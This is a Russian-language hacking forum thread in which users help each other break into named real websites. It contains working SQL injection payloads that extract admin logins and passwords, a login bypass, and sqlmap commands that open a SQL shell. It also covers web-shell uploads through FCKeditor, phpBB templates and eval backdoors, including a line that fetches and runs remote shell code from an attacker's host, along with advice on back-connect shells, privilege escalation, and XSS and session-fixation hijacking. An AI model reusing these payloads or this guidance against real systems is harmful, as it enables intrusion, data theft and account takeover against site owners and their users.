Большое спасибо, буду пробовать
borntobebad
05.03.2013, 19:10
ne kak ne mogu podobrat union+select , vashe ne chego ne xochet ponimat etot sayt , mojet kto nebud xotabi zacepku podkinut
http://www.pixheaven.net/bestof.php?begin=276&entout=12'
ili
http://www.pixheaven.net/photo.php?nom=120906_9930-46'
ne kak ne mogu podobrat union+select , vashe ne chego ne xochet ponimat etot sayt , mojet kto nebud xotabi zacepku podkinut
http://www.pixheaven.net/bestof.php?begin=276&entout=12'
ili
http://www.pixheaven.net/photo.php?nom=120906_9930-46'
что-то я тоже не могу вдуплить
просмотрел сайт, вот эти уязвимые к sql-inj параметры:
/bestof.php
begin
entout
/bestof_us.php
begin
entout
/blog.php
begin
/blog_us.php
begin
/livredor_lire.php
begin
/livredor_lire_us.php
begin
/maj.php
begin
/maj_us.php
begin
/photo
nom
/photo.php
nom
/photo_us
nom
/publications_site.php
begin
/publications_site_us.php
begin
/recherche_quoi.php
Afficher
begin
entout
/recherche_quoi_us.php
Afficher
begin
entout
/wallpapers.php
begin
entout
/wallpapers_us.php
begin
entout
но ни один не смог раскрутить...
ne kak ne mogu podobrat union+select , vashe ne chego ne xochet ponimat etot sayt , mojet kto nebud xotabi zacepku podkinut
http://www.pixheaven.net/bestof.php?begin=276&entout=12'
ili
http://www.pixheaven.net/photo.php?nom=120906_9930-46'
иньекция в лимите, поэтому ничего и не выходит
borntobebad
05.03.2013, 22:17
kokoy progoy ti naskanil eti dannie ? GhostW
borntobebad
05.03.2013, 22:19
qaz , tak tipo ne-kak ne razkrutit ?
qaz , tak tipo ne-kak ne razkrutit ?
нетс
иньекция в лимите, поэтому ничего и не выходит
Инъекция в Лимите прекрасно крутится.
Тут правильнее сказать "инъекция в лимите с использованием в запросе order by".
пацаны, как вы боритесь с ЧПУ?
GET
/page/id/5 - normal
/page/id/6-1 - показывает страницу 5
/page/id/5'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
уже понятно что всё довольно таки просто.
НО сраное чпу передаёт плюсы "как есть"
the right syntax to use near ''+and+--+' at line 1
та же хрень с пробелами, они превращаются в %20
/**/ - тоже не катит, этот каким-то образом влияет на само правило ЧПУ и параметры уходят не тому скрипту.
Га-Ноцри
06.03.2013, 00:51
Без ссылки, как ты понимаешь, трудно сказать, но попробуй поиграйся с альтернативами пробела.
%09
%0D
%0A
Ну и не стоит забывать про "безпробельный" вариант запроса, что-то типа:
select(1)from(users)where(id=1)
Без ссылки, как ты понимаешь, трудно сказать, но попробуй поиграйся с альтернативами пробела.
%09
%0D
%0A
Ну и не стоит забывать про "безпробельный" вариант запроса, что-то типа:
select(1)from(users)where(id=1)
игры с %09 etc ни к чему не приводят. запрос получается таким
select * from tbl where id=5%0D
в итоге
Unknown column '0D' in 'where clause'
уязвимый параметр находится не в скобках, а значит "безпробельный" тоже не получится.
та же хрень с пробелами, они превращаются в %20
/**/ - тоже не катит, этот каким-то образом влияет на само правило ЧПУ и параметры уходят не тому скрипту.
Это ЧПУ, можно попробовать реализовать так, как делается в REQUEST_URI и подобных случаях - В зависимости от сервера, мы напрямую в запросе(БЕЗ БРАУЗЕРА) без кодирования пробуем передать различные символы - (), TAB, %09, + и т.п. и с их кодированием соответственно и смотрим на то, что получается. Если никакие символы не интерпретируются в их аналоги, а всё лишнее кодируется то инъекцию почти всегда провести невозможно, за исключением некоторых простых случаев.
Нужно попробовать использовать различные методы кодирования и определить пропускные символы, интерпретацию мультибайтовых кодировок, какие-то непонятные случаи и дальше исходить от этого.
zloy_fantom
06.03.2013, 11:41
в случае если параметр передается явно в
GET
запросе и именем
s
, по условию исключаем Error-Based и Union техники то SQL-shell можно будет вызвать:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php?s=1" --technique="BT" --level=5 --sql-shell
в
POST
параметре
s
:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --data="s=1" --technique="BT" --level=5 --sql-shell
в
Cookie
параметре
s
:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --cookie="s=1" --technique="BT" --level=5 --sql-shell
в
Referer
:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --p referer --technique="BT" --level=5 --sql-shell
в
User-Agent
:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --p user-agent --technique="BT" --level=5 --sql-shell
в любом добавочном хидере:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --headers="Accept-Language: fr\nETag: 1%1" --technique="BT" --level=5 --sql-shell
и т.д.
Эх, попробовал.....
происходит редирект на login.php, ни auth ни cookie не помогают
Подскажите..
Вобщем раскрутил скулю, получил логин|пароль, но подозрительно что пароли хранятся в бд без хеширования, т.е. просто пасс лежит. Беру пары логин|пароль, пробую зайти в админку - нифига В чем может быть причина? В бд колонок с логинами\паролями больше нет...
Данные для входа хранятся не в БД, а в файле. Такое часто встречается, смиритесь!
Если есть права у пользователя БД на работу с файлами и известен пусть к сайту, можете попробовать поискать и почитать файлы конфигов!
borntobebad
06.03.2013, 18:30
BigBear . где прочитать на тему раскрутки лимита ? И еше , тут лимит на SELECT нарисовался , его можно обойти ? ели да то где почитать на эту тему ???
BigBear . где прочитать на тему раскрутки лимита ? И еше , тут лимит на SELECT нарисовался , его можно обойти ? ели да то где почитать на эту тему ???
Выдержка со RDOT'а
В limit, offset
(в запросе не должен присутствовать order by)
script.php?par=1,111111111 union select version(),2,3,4--
script.php?par=111111111 union select version(),2,3,4--
сорь, может не в тему но, слили БД сайта, админку найти не могу, в БД таюлици имеют префикс xpanel - в гугле ничего не могу найти про этот двиг, офф сайт уже давно в оффе, может кто что знает про етот двиг? где там админку можно найти?
http://adjump.ru/
пост
logsecurecash=1&login_name=[SQL inj]&login_pass=111111&x=31&y=13
перепробовал различные варианты...никак.
logsecurecash=1&login_name=' or 1#&login_pass=111111&x=31&y=13
Вы зашли как: advaweb
Баланс: 10 руб.
logsecurecash=1&login_name=
' or 1#
&login_pass=111111&x=31&y=13
Вы зашли как:
advaweb
Баланс: 10 руб.
Стыдно, спасибо
Mssql
Надо вывести name lastname email
(select top 1 cast(name as nvarchar)+char(0x7a)+cast(email as nvarchar) from member where id=4)--
вывод: name:email@email.com
Как вывести еще lastname в одном запросе , если делаю
(select top 1 cast(name as nvarchar)+char(0x7a)+cast(
lastname
as nvarchar+char(0x7а)+cast(email as nvarchar) from member where id=4)--
Не выводит 3 значение :
name:lastname:email@email.com
Как вывести одним запросом 3 значения?
Потому что скобку забыл в запросе
(select top 1 cast(name as nvarchar)+char(0x7a)+cast(lastname as nvarchar)+char(0x7а)+cast(email as nvarchar) from member where id=4)--
kacergei
09.03.2013, 11:11
Подскажите по поводу FCKeditor 2.5.1 Build 17566
txt файлы спокойно льются, а вот php никак нехочет пробывал:
1) Через /php/upload.php?Type=Media
2) Грузил txt указывал в Current Folder: wso.php%00
3) Пробывал %00 в url-decode, так же пробывал wso2.php%00.txt
Что посоветуете? других дыр нет есть еще CKEditor 3.2.1
Двиг: Powered by cc Engine (китайский двиг)
P.S>.htaccess так же не грузит
Подскажите в чем может быть проблема
Сообственно пытаюсь лить шелл через админку phpbb 3 через стили
Включаю выполнение php кода в шаблонах, иду в шаблоны faq_body.html
впиливаю код
Иду в forum.com/faq.php?c=phpinfo(); пхпинфо не выводится = \
Подскажите почему может не выполнятся пхпкод
права в админке полные, мб можно еще какнить залить?
panfilov1991
09.03.2013, 14:39
Что за бред, думать надо хоть не много головой, инъекция в куках, а Вы хотите их отключить? Тут дело в другом, человек совершенно не умеет этим всем пользоваться и работать с тем, что нашел ему сканер, да и по всей видимости, сам не понимает, что хочет.
Все отлично работает, запрос переделал, мне так удобнее...
Host: game.*****.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
Cookie: login=demodemo; pass="or(1)group+by(mid((select+concat_ws(0x3a,version() ,schema())),rand(0)|0))having(avg(0))or"
Duplicate entry '
5.5.29-1-log:s10parl
' for key 'group_key'
Версия -
5.5.29-1-log
Названия Базы Данных -
s10parl
"or(1)group+by(mid((
СЮДА ВСТАВЛЯЙТЕ СВОЙ ЗАПРОС
),rand(0)|0))having(avg(0))or"
Дальше делайте сами, если не знаете как, на форуме есть мануал -
ССЫЛКА (https://antichat.live/threads/43966/)
З.Ы. Для работы можете пользоваться тем же Acunetix, Burp Suite, Firefox (Live HTTP Headers) или HTTPAnalyzer (я предпочитаю его)!
пытаюсь отправить запросы для вывода данных хотя бы юзеров.
то и дело выходят ошибки :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' at line 1
Table 'panel.users' doesn't exist
Table 'panel.***' doesn't exist
Подскажите где взять список запросов?
winstrool
09.03.2013, 15:13
пытаюсь отправить запросы для вывода данных хотя бы юзеров.
то и дело выходят ошибки :
Подскажите где взять список запросов?
а какой запрос вы делайте? покажите.
panfilov1991
09.03.2013, 15:29
а какой запрос вы делайте? покажите.
"or(1)group+by(mid((SELECT * FROM users WHERE login='Admin' AND pass='123' OR login='Admin' --''),rand(0)|0))having(avg(0))or"
ошибка :
Table 'panel.users' doesn't exist
Как можно вывести названия таблиц?
Очень надо вывести логин и пасс админа
winstrool
09.03.2013, 15:44
ошибка :
Как можно вывести названия таблиц?
Очень надо вывести логин и пасс админа
"or(1)group+by(mid((SELECT concat_ws(0x3a,login,pass) FROM users WHERE login=0x41646D696E limit 0,1),rand(0)|0))having(avg(0))or"
там где значение 0x41646D696E это Admin, вам бы мануалы по mysql почитать!
panfilov1991
09.03.2013, 16:05
там где значение 0x41646D696E это Admin, вам бы мануалы по mysql почитать!
Мне реально стыдно! я уже их перечитался!
мне бы пароль админа содрать, или таблицы вывести с БД
Подскажите в чем может быть проблема
Сообственно пытаюсь лить шелл через админку phpbb 3 через стили
Включаю выполнение php кода в шаблонах, иду в шаблоны faq_body.html
впиливаю код
Иду в forum.com/faq.php?c=phpinfo(); пхпинфо не выводится = \
Подскажите почему может не выполнятся пхпкод
права в админке полные, мб можно еще какнить залить?
так вставляй
phpinfo();
Мне реально стыдно! я уже их перечитался!
мне бы пароль админа содрать, или таблицы вывести с БД
так а в чём собственно проблема?
так вставляй
phpinfo();
ни какого эффекта) ничего не выводит = \
я уже пробовал так)
KolosJey
10.03.2013, 00:49
"or(1)group+by(mid((SELECT concat_ws(0x3a,login,pass) FROM users WHERE login=0x41646D696E limit 0,1),rand(0)|0))having(avg(0))or"
там где значение 0x41646D696E это Admin, вам бы мануалы по mysql почитать!
Тебе бы тоже хоть что нибудь почитать, вместо того что бы советы давать.
Table 'panel.users' doesn't exist
Тебе бы тоже хоть что нибудь почитать, вместо того что бы советы давать.
он ему запрос дал и посоветовал мускуль подучить, чтоб он сам смог вывести таблицы, а ты тупо "умничаешь."
Делаю такой запрос
1+UnIon+selECt+1,2,3,4,5,6,version(),8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42&x=-392&y=-378 true
1+UnIon+selECt+1,2,3,4,5,6,group_concat(table_name ),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42+from+INFORMATION_SCHEMA.TABLES+--+&x=-392&y=-378 false
Выдает
Illegal mix of collations for operation 'UNION'
Как быть?
Га-Ноцри
10.03.2013, 03:09
Делаю такой запрос
1+UnIon+selECt+1,2,3,4,5,6,version(),8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42&x=-392&y=-378 true
1+UnIon+selECt+1,2,3,4,5,6,group_concat(table_name ),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42+from+INFORMATION_SCHEMA.TABLES+--+&x=-392&y=-378 false
Выдает
Illegal mix of collations for operation 'UNION'
Как быть?
Если не ошибаюсь, то такая ошибка обычно связана с проблемами в кодировке. И, судя по всему, в ошибке в вашем случае явно не указана нужная. Если ошибаюсь то меня поправят.
Немного пищи для размышления:
cast(version()+as+binary)
convert(version(),binary)
convert(version()+using+latin1)
convert(version()+using+binary)
aes_decrypt(aes_encrypt(version(),1),1)
unhex(hex(version()))
Попробуйте при выводе нужной информации использовать приведенные выше примеры.
HeaVeNSeR
10.03.2013, 03:50
ребят,хелп ми,плз
есть уязвимость 'PHP Code execution'...выполняются phpinfo(),system(ls) и т.д.....слэшируются кавычки,хотя MQ=Off...всё бы ничего,можно было бы обойти c помощью base64,либо system($_GET[a])...но режутся заглавные....
что можно сделать в данном случае?
ребят,хелп ми,плз
есть уязвимость 'PHP Code execution'...выполняются phpinfo(),system(ls) и т.д.....слэшируются кавычки,хотя MQ=Off...всё бы ничего,можно было бы обойти c помощью base64,либо system($_GET[a])...но режутся заглавные....
что можно сделать в данном случае?
print(`я консольная команда`);
HeaVeNSeR
10.03.2013, 05:00
print(`я консольная команда`);
не совсем понял...)
как,к примеру,вывести результат system('ls -la')? (экранируются кавычки и режутся заглавные)
не совсем понял...)
как,к примеру,вывести результат system('ls -la')?
(экранируются кавычки и режутся заглавные)
Такая кавычка тоже режится ?
`
Как насчет
%27
или
%60
?
HeaVeNSeR
10.03.2013, 19:50
Такая кавычка тоже режится ?
Как насчет или ?
такая кавычка не режется, print(`ls -la`) сработало...но теперь похоже режутся слэши...ни ls ../,ни ls ..\ не срабатывает...соотв-но,залиться тоже не получается...
есть ещё варианты?
help
Парни, хелп!
_ttp://www.infotopcar.com/index.php?option=com_parcoauto&action=scheda&idVeicolo=-3473%20UNION%20ALL%20SELECT%200,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,CONCAT%280x7e,version%28%29,0x7e%29,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0--%20&tipo=auto
Не получается продвинуть далее.
Парни, хелп!
_ttp://www.infotopcar.com/index.php?option=com_parcoauto&action=scheda&idVeicolo=-3473%20UNION%20ALL%20SELECT%200,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,CONCAT%280x7e,version%28%29,0x7e%29,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0--%20&tipo=auto
Не получается продвинуть далее.
www.infotopcar.com/index.php?option=com_parcoauto&action=scheda&idVeicolo=-3473 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,t able_name,38,39,40,41,42,43,44,45,46,47,48,49,50,5 1,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67, 68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84 ,85, 86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101, 103,104,105,106,107,108,109,110,111,112,113,114,11 5,116,117,118,119,120,121,122,123,124,125,126,127, 128,129,130,131,132,133,134,135,136,137,138,139,14 0,141,142,143,144,145,146,147,148,149,150,151,152, 153,154,155,156+from+information_schema.tables+whe re+table_schema=0x706f7274616c636c7562+limit+0,1--+-&tipo=auto
Boombilka
11.03.2013, 16:24
Есть булковский форум, прописал в faq_complite eval($_GET[e]);.
Вроде бы все хорошо, пхп инфо выводиться, но вот только:
allow_url_include Off
allow_url_fopen Off
Интересует, как заливаться в данной непростой ситуации? До этого пробывал вгетом лить в tmp, вроде бы все залилось, только вот site.com/tmp/shell.php не открывается, и выдает 404 ошибку. И да, на всех папках стоят права nobody(мб это как-то влияет?).
Заранее спасибо
Есть булковский форум, прописал в faq_complite eval($_GET[e]);.
Вроде бы все хорошо, пхп инфо выводиться, но вот только:
allow_url_include Off
allow_url_fopen Off
Интересует, как заливаться в данной непростой ситуации? До этого пробывал вгетом лить в tmp, вроде бы все залилось, только вот site.com/tmp/shell.php не открывается, и выдает 404 ошибку. И да, на всех папках стоят права nobody(мб это как-то влияет?).
Заранее спасибо
пропиши eval(base64_decode($_GET[e]));
и юзай курл
exstreme
11.03.2013, 19:59
Привет всем!
Помогите пожалуйста разобраться с XSS-уязвимостями. Не совсем понятно, как использовать их, чтобы к примеру получить чужие cookies, а не свои.
Что делать с такого вида уязвимостями?
URL encoded POST input poll%5Btitle%5D was set to '"()&%1prompt(911011)
или
URL encoded POST input character%5bdescription%5d was set to 1
The input is reflected inside a text element.
Также интересует уязвимости типа "HTML form without CSRF protection" можно использовать для подмены данных или не только?
Сообственно впервые столкнулся с такой проблемой)
Вообщем через скуль добыл пасс от рута мускула , на сайте есть phpmyadmin
Сообственно пытался залить шелл через пхпмуадмин и столкнулся с такой проблемой
а именно с определение пути к сайту
например мой сайт называется sqlinject.com
sqlinject.com/news.php?id=1'
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/vhost/sql.com/news.php on line 63
так же в корне присувствует файл phpinfo в котором путь так же прописан таким образом /var/www/vhost/sql.com/phpinfo.php
Решил посмотреть сайты на одном ип в итоге получил список из 50+ сайтов... попробовал просканить эти сайты на директории и файлы оказалось что в каждом сайте присувствуют такие файлы config.php, connect.php, phpinfo.php и еще куча файлов. вообщем файлы одни и теже на каждом сайте... это я клоню к тому что файлы эти посути лежат в одной директории, но контент на сайтах разный совершенно...
в файле phpinfo.php на каждом сайте один и тот же путь) "/var/www/vhost/sql.com/phpinfo.php"
Пробовал прочитать файл через LOAD_FILE например phpinfo с пути написанного выше) не читает... хотя /etc/passwd читает)
Чисто для читалки попробовал залить минишелл через пхпмуадмин в /tmp/
Шелл залился и прочитался через LOAD_FILE
Сообственно интересует вопрос возможно ли как-то получить настоящий путь к сайту sqlinject.com, что бы залится)
Мб есть у кого какие нить соображения по этому поводу?)
Есть папочка icons от апача) но она походу не доступна для записи) да и путь искать надо)
Если есть у кого желание помочь и поломать голову)) могу предоставить root;pass к phpmyadmin ))
jestkokos
12.03.2013, 05:53
http://bkwar.ru/news/?topic=494 Протестил через Хавиж (ну первонюбские примычки) Скюля методом стринг. Хавиж выводит Бд всё нормально таблицы и так далее...
Ихнее http://bkwar.ru/www/labirint3/ulldie.php Пхпинфо
ИСП мэнэджер тут https://bkwar.ru:1500/
Ещё БД тут http://bkwar.ru/pgadmin/
Открытые порты сканеные через нмап : 110 , 143, 1500 , 21 ,22 , 443 , 4444 ,5000 ,53 , 993 ,995 ну и соотвественно 80.
Что нашёл webshag Напишу более подозрительные
/robots.txt found. It might be interesting to have a look inside.
/bin/ Directory indexing is enabled: CGI directory
/bin/ This might be interesting... possibly a system shell found.
/webmail/src/read_body.php This might be interesting... has been seen in web logs from an unknown scanner.
Ну есть ещё уйма директорий ...
А да сканер Дирбустер показал это : http://bkwar.ru/myadmin/setup/index.php
Пробовал разные варианты прочитанные и не прочитанные. А у них отключенно выползание ерророк (тут и ступор).
Недельки две мучаюсь. может подскажите как как всё это преодолеть и вынести результат в браузер.
Прошу прощение если не туда всунул вопрос. Ещё не освоился у вас...
нужно вывести username,password при помощи sqlmap, где usertype=Administrator
http://blindcanadians.ca/press_releases/index.php?BriefID=50+union+select+concat_ws(0x3a,u sername,password)+from+users+where+usertype='Admin istratot'+--+
так дампится вся база, как сделать так, чтобы выводился только Administrator?
sqlmap -u "http://blindcanadians.ca/press_releases/index.php?BriefID=50" --dump -T users -v 1
я тут с такой поблемой столкнулся, залил на сайт шелл, отредактировал морду, открываю сам сайт, изменений ноль, смотр на Server IP: там написано 127.0.0.1 что ет за фигня такая?
я тут с такой поблемой столкнулся, залил на сайт шелл, отредактировал морду, открываю сам сайт, изменений ноль, смотр на Server IP: там написано 127.0.0.1 что ет за фигня такая?
посмотри с другово браузера этот же сайт, или просто очисти кеш
посмотри с другово браузера этот же сайт, или просто очисти кеш
та это тут не причём, индекс действительно не изменился, вот если удалить файл то да, напишет ошибку, а от изменений ноль толку
Cennarios
12.03.2013, 23:26
И чего удивительного? Наверняка какой нибудь APC cache или что-то из этой оперы стоит. При изменении кеш просто не успевает обновиться, а при удалении файловый идентификатор из ФС исчезает и в opcode кешер вносится соответствующая информация. Посмотри что используется в phpinfo и если тот же APC то у него есть менеджер одним файлом в котором удобно обнулять кеш.
По поводу IP учите матбазу господа. В стандартной связке nginx+apache, к примеру, фронтэнд вешается на внешний интерфейс имеющий уникальный IP, в то время как бэкэнд вешается на локальный те localhost он же 127.0.0.1. А так как php выполняется на уровне бэкэнда будь то mod_php или cgi, то и переменная окружения которая выводится в serverIP имеет оный localhost
И чего удивительного? Наверняка какой нибудь APC cache или что-то из этой оперы стоит. При изменении кеш просто не успевает обновиться, а при удалении файловый идентификатор из ФС исчезает и в opcode кешер вносится соответствующая информация. Посмотри что используется в phpinfo и если тот же APC то у него есть менеджер одним файлом в котором удобно обнулять кеш.
По поводу IP учите матбазу господа. В стандартной связке nginx+apache, к примеру, фронтэнд вешается на внешний интерфейс имеющий уникальный IP, в то время как бэкэнд вешается на локальный те localhost он же 127.0.0.1. А так как php выполняется на уровне бэкэнда будь то mod_php или cgi, то и переменная окружения которая выводится в serverIP имеет оный localhost
чего ты так рагорячился)) мы же не такие про как ты))
глянул пхп инфо, есть там apc, как там обнулить кеш?
Cennarios
13.03.2013, 00:23
погугли - apc.php manager по самому первому линку там можно скачать скрипт. Очень просто настраивается. В правом верхнем углу кнопка - clear opcode cache. Меняешь php файл. Обнуляешь кеш, заново инициируешь запуск файла в который были внесены изменения. Стоит отметить, что далее в frontend-backend данные от бэкенда попадают в тот же файловый кеш нгинкса или мемкеш. Так что если все равно не обновится значит копать в эту сторону.
Как пользоваться PHPSESSID session fixation дайте ссылку на топ
Как пользоваться
PHPSESSID session fixation
дайте ссылку на топ
Возможный путь использования XSS:
-Нахождение XSS
-Впаривание XSS
-Получение PHPSESSID
-Заход под PHPSESSID
PHPSESSID session fixation:
-Создание своего уже-известного PHPSESSID
-Установка этого PHPSESSID у у аленого человека(Впариван ие)
-Он авторизуется по этим PH PSESSID
-Мы заходим под уже извест ным PHPSESSID
Может использоваться как альтернатива кражи куков в некоторых случаях, при впаривани методом соц. инженерии, при отправке скомпрометированного ответа сервером.
Установка PHPSESSID может быть в параметрах методом GET, а не только через куки.
http://www.acros.si/papers/session_fixation.pdf
panfilov1991
13.03.2013, 13:41
отправляю запрос на сервер
"or(1)group+by(mid((SELECT concat_ws(0x3a,login,pass) FROM users WHERE login=0x41646D696E limit 0,1),rand(0)|0))having(avg(0))or"
Выдает :
Table 'panel.users' doesn't exist
Сайт
http://game.parlahost.ru/
panfilov1991
13.03.2013, 20:38
отправляю запрос на сервер
Выдает :
Сайт
Нужно вывести лог и пасс админа
Есть шелл(с нормальным PR), но на этом шелле хостятся еще приличное кол-во нулевиков, папки открыты(с нулевика можно спокойно залится на сайт с норм PR), возник вопрос:
можно ли какнить изменить права на доступ с этих нулевиков в другие папки?
winstrool
14.03.2013, 18:36
Есть шелл(с нормальным PR), но на этом шелле хостятся еще приличное кол-во нулевиков, папки открыты(с нулевика можно спокойно залится на сайт с норм PR), возник вопрос:
можно ли какнить изменить права на доступ с этих нулевиков в другие папки?
Можно, если в заливаемой папке полные права или принадлежат одной группе!
Имеется у нас сайт N, а на этом сайте уязвимость /search/?name=, пропускающая PHP-инъекции, то есть запрос /search/?name={${phpinfo()}} выводит phpinfo. В результате бурного гугления пришёл к такому инжекту: name={${eval(stripslashes($_GET[cmd]))}}&cmd=eval(file_get_contents('шелл'));.
И вроде бы, лепота, да прав нет, словно у негра в XX веке в США(исторический факт, расизм - нихарашо). С copy(), как и с file_put_contents() разобраться не могу, хотя сам понимаю, что это вроде бы элементарно. Поэтому и прошу совета. Заранее благодарен!
Имеется у нас сайт N, а на этом сайте уязвимость
/search/?name=
, пропускающая PHP-инъекции, то есть запрос
/search/?name={${phpinfo()}}
выводит phpinfo. В результате бурного гугления пришёл к такому инжекту:
name={${eval(stripslashes($_GET[cmd]))}}&cmd=eval(file_get_contents('шелл'));
.
И вроде бы, лепота, да прав нет, словно у негра в XX веке в США(исторический факт, расизм - нихарашо). С copy(), как и с file_put_contents() разобраться не могу, хотя сам понимаю, что это вроде бы элементарно. Поэтому и прошу совета. Заранее благодарен!
eval(file_get_contents('шелл'));. шелл выполняется, просто прав нет или код шелл даже не исполняется? Если первое, то ищи способы поднять привилегии
Имеется у нас сайт N, а на этом сайте уязвимость
/search/?name=
, пропускающая PHP-инъекции, то есть запрос
/search/?name={${phpinfo()}}
выводит phpinfo. В результате бурного гугления пришёл к такому инжекту:
name={${eval(stripslashes($_GET[cmd]))}}&cmd=eval(file_get_contents('шелл'));
.
И вроде бы, лепота, да прав нет, словно у негра в XX веке в США(исторический факт, расизм - нихарашо). С copy(), как и с file_put_contents() разобраться не могу, хотя сам понимаю, что это вроде бы элементарно. Поэтому и прошу совета. Заранее благодарен!
Локальные файлы инклудятся?
Если можешь проинклудить файл например с папки /tmp/, то попробуй залится через phpinfo )
десять раз так получалось))
eval(file_get_contents('шелл'));. шелл выполняется, просто прав нет или код шелл даже не исполняется? Если первое, то ищи способы поднять привилегии
Выполняется, прав нет вообще, даже файлы вывести не может.
Локальные файлы инклудятся?
Если можешь проинклудить файл например с папки /tmp/, то попробуй залится через phpinfo )
десять раз так получалось))
В конкретном случае, который я пытаю сейчас, да, url_include работает, но давайте рассматривать вот такой расклад:
allow_url_fopen On
allow_url_include Off
Понимаю, что шелл надо бы залить, желательно в tmp, ибо там, вроде 777, но как? Можно сразу узнать готовый код? cmd=copy('сайт/шелл.тхт','shell.php'); не выполняется, а cmd=eval(file_put_contents('сайт/шелл.тхт','shell.php')); тоже, а больше функций я и не знаю Если вдруг нужны какие-то ещё данные из phpinfo - пишите.
PS: Как залить через phpinfo то?
cmd=
Откуда ты взял это cmd?
В результате бурного гугления пришёл к такому инжекту:
name={${eval(stripslashes($_GET[cmd]))}}&cmd=eval(file_get_contents('шелл'));
.
Вот.
Вот.
Что вы мозги себе еб***. заливаешь на хостинг\дедик\к себе на комп если ип-белый код шелла без в формате .txt.
далее с бэкдора запускаешь=>?cmd=eval(file_get_contents('http://myhosting/fileScodomShell'a.txt')); =>PROFIT!!! всегда робит ,а там уже делай, что хочешь...если фильтры юзай char/base64_decode
Что вы мозги себе еб***. заливаешь на хостинг\дедик\к себе на комп если ип-белый код шелла без в формате .txt.
далее с бэкдора запускаешь=>?cmd=eval(file_get_contents('http://myhosting/fileScodomShell'a.txt')); =>PROFIT!!! всегда робит ,а там уже делай, что хочешь...если фильтры юзай char/base64_decode
Вопрос - это ты не умеешь читать, или я объяснять? Шелл выводится, работает, но прав нет. Вообще. Даже файлы не отображает.
jestkokos
17.03.2013, 04:30
Спасибо помогли в минусовом смысле....
Вопрос - это ты не умеешь читать, или я объяснять? Шелл выводится, работает, но прав нет. Вообще. Даже файлы не отображает.
Могут быть функции отключены некоторые, редко файлы не отображаются, делай биндпрот\бэкконект первой командой и будет тебе счастье.
DarkSorcerer
17.03.2013, 11:22
Имеется у нас сайт N, а на этом сайте уязвимость
/search/?name=
, пропускающая PHP-инъекции, то есть запрос
/search/?name={${phpinfo()}}
выводит phpinfo. В результате бурного гугления пришёл к такому инжекту:
name={${eval(stripslashes($_GET[cmd]))}}&cmd=eval(file_get_contents('шелл'));
.
И вроде бы, лепота, да прав нет, словно у негра в XX веке в США(исторический факт, расизм - нихарашо). С copy(), как и с file_put_contents() разобраться не могу, хотя сам понимаю, что это вроде бы элементарно. Поэтому и прошу совета. Заранее благодарен!
Какой шелл пытаешься выполнять?
Попробуй этот http://rusfolder.com/35507131 файлы\директории должны выводится.
exstreme
17.03.2013, 13:21
Есть форум с XSS уязвимостью в названии темы. Что можно сделать для получения паролей, кроме как сниффером читать куки?
Какой шелл пытаешься выполнять?
Попробуй этот http://rusfolder.com/35507131 файлы\директории должны выводится.
WSO без пароля не выводил, загнал mobi - вывел. Куда шагать теперь? Между папками переключаться не получается, ибо шелл на сервере не сохранён.
Могут быть функции отключены некоторые, редко файлы не отображаются, делай биндпрот\бэкконект первой командой и будет тебе счастье.
Не работает вроде, во всяком случае биндпорт.
PS: Ребят, огромное спасибо за помощь, на RDot'e послали лесом, причём не кто-то, а модератор.
DarkSorcerer
17.03.2013, 18:27
WSO без пароля не выводил, загнал mobi - вывел. Куда шагать теперь? Между папками переключаться не получается, ибо шелл на сервере не сохранён.
Не работает вроде, во всяком случае биндпорт.
PS: Ребят, огромное спасибо за помощь, на RDot'e послали лесом, причём не кто-то, а модератор.
